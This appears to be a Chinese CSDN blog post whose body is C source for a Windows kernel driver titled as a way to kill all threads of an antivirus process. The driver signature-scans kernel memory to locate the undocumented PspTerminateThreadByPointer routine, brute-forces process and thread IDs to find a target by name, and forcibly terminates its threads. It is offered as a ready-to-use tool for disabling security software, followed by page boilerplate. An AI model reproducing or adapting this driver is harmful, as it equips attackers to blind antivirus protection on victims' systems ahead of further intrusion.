杀死所有线程干掉某杀软

于 2021-07-27 09:09:24 发布
阅读量248 收藏 1
点赞数
分类专栏: 系统调用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ADADQDQQ/article/details/119133278
版权 
#include <ntddk.h>


NTSTATUS
PspTerminateThreadByPointer(
	IN PETHREAD Thread,
	IN NTSTATUS ExitStatus,
	IN BOOLEAN DirectTerminate
);

NTSTATUS
PsGetProcessImageFileName(
	__in PEPROCESS Process
);

NTSTATUS
PsLookupProcessByProcessId(
	__in HANDLE ProcessId,
	__deref_out PEPROCESS* Process
);

NTSTATUS
PsLookupThreadByThreadId(
	__in HANDLE ThreadId,
	__deref_out PETHREAD* Thread
);
typedef NTSTATUS(*PSPTERMINATETHREADBYPOINTER) (PETHREAD pEThread, NTSTATUS ntExitCode, BOOLEAN bDirectTerminate);
ULONG GetTIDOffset();
PVOID SearchMemory(PVOID pStartAddress, PVOID pEndAddress, PUCHAR pMemoryData, ULONG ulMemoryDataSize);
PVOID GetPspLoadImageNotifyRoutine();
PVOID SearchPspTerminateThreadByPointer(PUCHAR pSpecialData, ULONG ulSpecialDataSize);
// 获取 PspTerminateThreadByPointer 函数地址
PVOID GetPspLoadImageNotifyRoutine()
{
	PVOID pPspTerminateThreadByPointerAddress = NULL;
	RTL_OSVERSIONINFOW osInfo = { 0 };
	UCHAR pSpecialData[50] = { 0 };
	ULONG ulSpecialDataSize = 0;
	// 获取系统版本信息, 判断系统版本
	RtlGetVersion(&osInfo);
	if (6 == osInfo.dwMajorVersion)
	{
		if (1 == osInfo.dwMinorVersion)
		{
			// Win7
#ifdef _WIN64
			// 64 位
			// E8
			pSpecialData[0] = 0xE8;
			ulSpecialDataSize = 1;
#else
			// 32 位
			// E8
			pSpecialData[0] = 0xE8;
			ulSpecialDataSize = 1;
#endif    
		}
		else if (2 == osInfo.dwMinorVersion)
		{
			// Win8
#ifdef _WIN64
			// 64 位
#else
			// 32 位
#endif
		}
		else if (3 == osInfo.dwMinorVersion)
		{
			// Win8.1
#ifdef _WIN64
			// 64 位
			// E9
			pSpecialData[0] = 0xE9;
			ulSpecialDataSize = 1;
#else
			// 32 位
			// E8
			pSpecialData[0] = 0xE8;
			ulSpecialDataSize = 1;
#endif            
		}
	}
	else if (10 == osInfo.dwMajorVersion)
	{
		// Win10
#ifdef _WIN64
		// 64 位
		// E9
		pSpecialData[0] = 0xE9;
		ulSpecialDataSize = 1;
#else
		// 32 位
		// E8
		pSpecialData[0] = 0xE8;
		ulSpecialDataSize = 1;
#endif
	}
	// 根据特征码获取地址
	pPspTerminateThreadByPointerAddress = SearchPspTerminateThreadByPointer(pSpecialData, ulSpecialDataSize);
	return pPspTerminateThreadByPointerAddress;
}

// 根据特征码获取 PspTerminateThreadByPointer 数组地址
PVOID SearchPspTerminateThreadByPointer(PUCHAR pSpecialData, ULONG ulSpecialDataSize)
{
	UNICODE_STRING ustrFuncName;
	PVOID pAddress = NULL;
	LONG lOffset = 0;
	PVOID pPsTerminateSystemThread = NULL;
	PVOID pPspTerminateThreadByPointer = NULL;
	// 先获取 PsTerminateSystemThread 函数地址
	RtlInitUnicodeString(&ustrFuncName, L"PsTerminateSystemThread");
	pPsTerminateSystemThread = MmGetSystemRoutineAddress(&ustrFuncName);
	if (NULL == pPsTerminateSystemThread)
	{
		//ShowError("MmGetSystemRoutineAddress", 0);
		return pPspTerminateThreadByPointer;
	}
	// 然后, 查找 PspTerminateThreadByPointer 函数地址
	pAddress = SearchMemory(pPsTerminateSystemThread,
		(PVOID)((PUCHAR)pPsTerminateSystemThread + 0xFF),
		pSpecialData, ulSpecialDataSize);
	if (NULL == pAddress)
	{
		//ShowError("SearchMemory", 0);
		return pPspTerminateThreadByPointer;
	}
	// 先获取偏移, 再计算地址
	lOffset = *(PLONG)pAddress;
	pPspTerminateThreadByPointer = (PVOID)((PUCHAR)pAddress + sizeof(LONG) + lOffset);
	return pPspTerminateThreadByPointer;
}

// 指定内存区域的特征码扫描
PVOID SearchMemory(PVOID pStartAddress, PVOID pEndAddress, PUCHAR pMemoryData, ULONG ulMemoryDataSize)
{
	PVOID pAddress = NULL;
	PUCHAR i = NULL;
	ULONG m = 0;
	// 扫描内存
	for (i = (PUCHAR)pStartAddress; i < (PUCHAR)pEndAddress; i++)
	{
		// 判断特征码
		for (m = 0; m < ulMemoryDataSize; m++)
		{
			if (*(PUCHAR)(i + m) != pMemoryData[m])
			{
				break;
			}
		}
		// 判断是否找到符合特征码的地址
		if (m >= ulMemoryDataSize)
		{
			// 找到特征码位置, 获取紧接着特征码的下一地址
			pAddress = (PVOID)(i + ulMemoryDataSize);
			break;
		}
	}
	return pAddress;
}

//获取EPROCESS
PEPROCESS FindProcessByName(char* Name)
{
	PEPROCESS findProcess = NULL;
	for (int i = 4; i < 0x1000000; i += 4)
	{
		PEPROCESS Process = NULL;
		NTSTATUS status = PsLookupProcessByProcessId((HANDLE)i, &Process);
		if (!NT_SUCCESS(status))
		{
			continue;
		}

		PUCHAR processname = PsGetProcessImageFileName(Process);
		if (processname && _stricmp(processname, Name) == 0)
		{
			findProcess = Process;
			break;
		}

		ObDereferenceObject(Process);
	}
	return findProcess;
}


VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	
}

//获取EPROCESS当前ID
ULONG GetSignaturePID()
{
	ULONG uRet = 0;
	PUCHAR puAddress = (ULONG)PsGetProcessId;
	for (ULONG i = 0; i < 100; i++)
	{
		if (puAddress[0] == 0x8b && puAddress[1] == 0x80)
		{
			uRet = *(ULONG*)(puAddress + 2);
			break;
		}
		puAddress++;
	}
	return uRet;
}

//杀死所有线程
VOID KillAllThreads(PEPROCESS PROCESSINFO)
{
	ULONG Offset=GetSignaturePID();//得到偏移
	ULONG uProcessID=*(ULONG*)((PUCHAR)PROCESSINFO + Offset);//得到父进程ID

	PETHREAD pEThread = NULL;
	//暴力搜索
	for (ULONG i = 4; i < 0x800000; i += 4)
	{
		
		NTSTATUS status = PsLookupThreadByThreadId((HANDLE)i, &pEThread);
		if (status != 0)
		{
			continue;
		}
		ULONG ParentProcessID = *(ULONG*)((PUCHAR)pEThread + GetTIDOffset() - 4);//获取该线程父进程ID
		if (ParentProcessID == uProcessID)
		{
			PSPTERMINATETHREADBYPOINTER 
				pPspTerminateThreadByPointerAddress = GetPspLoadImageNotifyRoutine();

			pPspTerminateThreadByPointerAddress(pEThread, 0, 1);//杀死线程
		}
	}
}

//获取偏移
ULONG GetTIDOffset()
{
	ULONG uRet = 0;
	PUCHAR puAddress = (ULONG)PsGetThreadId;
	for (ULONG i = 0; i < 100; i++)
	{
		if (puAddress[0] == 0x8b && puAddress[1] == 0x80)
		{
			uRet = *(ULONG*)(puAddress + 2);
			break;
		}
		puAddress++;
	}
	return uRet;
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pRet)
{
	pDriver->DriverUnload = DriverUnload;
	DbgBreakPoint();
	PEPROCESS pProcess = FindProcessByName("????");//这里杀啥填啥
	if (pProcess == 0)
	{
		return STATUS_UNSUCCESSFUL;
	}
	KillAllThreads(pProcess);//杀死所有线程
	ObReferenceObject(pProcess);
	return STATUS_SUCCESS;
}
ADADQDQQ
关注
专栏目录
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值